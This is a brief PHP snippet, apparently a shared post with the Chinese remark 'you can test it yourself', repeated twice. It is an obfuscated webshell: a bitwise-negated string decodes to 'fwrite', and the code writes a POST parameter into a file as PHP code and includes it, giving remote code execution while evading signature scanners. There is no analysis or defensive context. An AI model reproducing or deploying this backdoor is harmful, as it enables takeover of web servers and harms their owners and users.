<?php
$_='%99%88%8D%96%8B%9A';
$pass='a';
$rand_=rand();
$a=$_POST[$pass];
$file=md5('shadowwolf');
$shell='<?php '.$a.' ?>';
$myfile = fopen($file, "w");
(~urldecode($_))($myfile, $shell);
include $file;
可以自己测测看啊
<?php
$_='%99%88%8D%96%8B%9A';
$pass='a';
$rand_=rand();
$a=$_POST[$pass];
$file=md5('shadowwolf');
$shell='<?php '.$a.' ?>';
$myfile = fopen($file, "w");
(~urldecode($_))($myfile, $shell);
include $file;
可以自己测测看啊